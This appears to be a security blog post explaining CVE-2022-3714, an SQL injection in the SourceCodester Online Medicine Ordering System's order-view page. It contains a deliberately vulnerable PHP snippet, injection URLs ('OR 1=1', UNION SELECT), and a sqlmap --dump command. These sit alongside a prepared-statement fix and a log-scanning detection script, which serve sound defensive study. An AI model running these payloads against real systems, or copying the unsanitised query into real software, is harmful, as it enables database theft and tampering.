CVE-2022-3714 - Critical SQL Injection in SourceCodester Online Medicine Ordering System 1. (VDB-212346) Explained
In late 2022, security researchers discovered a critical vulnerability (CVE-2022-3714) in the widely used SourceCodester Online Medicine Ordering System 1.. This flaw allows attackers to execute SQL Injection attacks by manipulating the id parameter in the admin panel’s order view page. If your organization uses this system or if you’re a developer tasked with securing similar PHP/MySQL applications, this post is for you.
CVE-2022-3714 is a SQL Injection vulnerability present in an unknown function within
/admin/?page=orders/view_order
Vulnerability Database Reference: VDB-212346
When an attacker crafts a special request, they can insert malicious SQL into the id parameter. If successful, the attacker may read, modify, or delete database contents, gain access to sensitive information, or take control of the web application.
Targeted URL
http://<target>/admin/?page=orders/view_order&id=YOUR_INPUT_HERE
Problem:
The backend code fetches the id parameter from the URL and adds it directly into a SQL query without sanitization.
Example Vulnerable PHP Code
<?php
// File: admin/orders/view_order.php
$id = $_GET['id'];
$query = "SELECT * FROM orders WHERE id = $id"; // No sanitization!
$result = mysqli_query($conn, $query);
// ...rest of the code
?>
Because $id is not checked or cleaned, an attacker can tamper with the id value to inject arbitrary SQL.
An attacker can submit URLs like
http://<target>/admin/?page=orders/view_order&id=1 OR 1=1
This turns the SQL into
SELECT * FROM orders WHERE id = 1 OR 1=1
Because 1=1 is always true, this query returns every row in the orders table instead of the single order requested, disclosing all order data to the attacker.
Extracting Data via SQL Injection
Attackers can comment out the rest of the query, or use UNION-based injections to retrieve additional information from other tables.
Example
http://<target>/admin/?page=orders/view_order&id=1 UNION SELECT user(),database(),version(),4--
This can reveal the database user, the database name, and the server version, among other details.
Using SQLMap for Automated Attacks
SQLMap is a popular open-source penetration testing tool that automates exploiting SQL injection flaws.
Example Command
sqlmap -u "http://target/admin/?page=orders/view_order&id=1" --cookie="PHPSESSID=..." --dump
Potential Impacts
- Database Disclosure: Download any data from the database (usernames, passwords, medicine records, etc.).
- Database Manipulation: Change or inject malicious data.
- Full System Compromise: In some setups, attackers can further escalate privileges, upload webshells, or pivot inside your network.
Suppose an admin views orders at
/admin/?page=orders/view_order&id=5
If an attacker sends
/admin/?page=orders/view_order&id=5 UNION SELECT 1, 'hacked', 'by', 'attacker'--
The application may display a page with 'hacked by attacker' if results are shown ("in-band" injection).
Mitigation & Fix
1. Always Use Prepared Statements / Parameterized Queries!
SAFE CODE EXAMPLE
<?php
// Accept only an integer id; (int) turns any non-numeric input into 0.
$id = (int) $_GET['id'];
// $conn is the application's existing mysqli connection.
$stmt = $conn->prepare("SELECT * FROM orders WHERE id = ?");
$stmt->bind_param("i", $id); // bound as a parameter, never concatenated into the query
$stmt->execute();
$result = $stmt->get_result();
?>
2. Accept Only Numbers for id:
Always cast the id to an integer before using it, as in the example above ($id = (int) $_GET['id'];), so that text such as "OR 1=1" can never reach the query.
3. Update Your Application:
If you use SourceCodester’s script, check for official patches/updates on their website.
4. Restrict Admin Access:
Reduce public exposure of the /admin/ directory using firewalls or HTTP auth.
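Alongside the fixes above, a defender can check web server access logs for requests to the vulnerable page whose id parameter is not a plain integer, which is exactly what the integer cast and prepared statement would reject. The following Python script is an added example, not code from the original post or from the SourceCodester project; the log lines are constructed and use the injection strings shown earlier on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined" format; the request target is
# percent-encoded as a browser or scanner would send it.
SAMPLE_LOG = """\
203.0.113.10 - - [27/Oct/2022:10:15:01 +0000] "GET /admin/?page=orders/view_order&id=5 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
203.0.113.10 - - [27/Oct/2022:10:15:09 +0000] "GET /admin/?page=orders/view_order&id=5%20OR%201%3D1 HTTP/1.1" 200 9813 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Oct/2022:10:16:30 +0000] "GET /admin/?page=orders/view_order&id=1%20UNION%20SELECT%20user()%2Cdatabase()%2Cversion()%2C4-- HTTP/1.1" 200 4210 "-" "sqlmap/1.6"
203.0.113.10 - - [27/Oct/2022:10:17:02 +0000] "GET /admin/?page=medicines HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
VULN_PAGE = "orders/view_order"   # the page parameter named in the advisory
INT_RE = re.compile(r"^\d+$")     # the only shape a legitimate order id should have

def parse_line(line):
    """Split one access-log line into fields; return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def suspicious_id(target):
    """Return the decoded id if the request hits the vulnerable page with a
    non-integer id, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.startswith("/admin/"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # also percent-decodes values
    if qs.get("page", [None])[0] != VULN_PAGE:
        return None
    for raw in qs.get("id", []):
        if not INT_RE.match(raw):
            return raw
    return None

def scan_log(text):
    """Return one record per request that looks like an injection attempt."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        bad = suspicious_id(rec["target"])
        if bad is not None:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "id": bad})
    return hits

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} id={h["id"]!r}')
```

Run it against the real access log (one line per request) to list the source addresses and decoded payloads that hit this page with a malformed id; a match is a strong signal that the vulnerable endpoint was probed before patching.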
References
- Vulnerability details on VulDB
- Exploit details on CXSecurity
- Original project page
- SQL Injection (OWASP)
Conclusion
CVE-2022-3714 is a textbook example of why user input should never be trusted, especially in admin pages. Even if your app is for a “small business,” attackers worldwide automate exploitation of these types of bugs. Patching, input validation, and using parameterized SQL queries are your best protection.
Timeline
Published on: 10/27/2022 10:15:00 UTC
Last modified on: 10/28/2022 18:29:00 UTC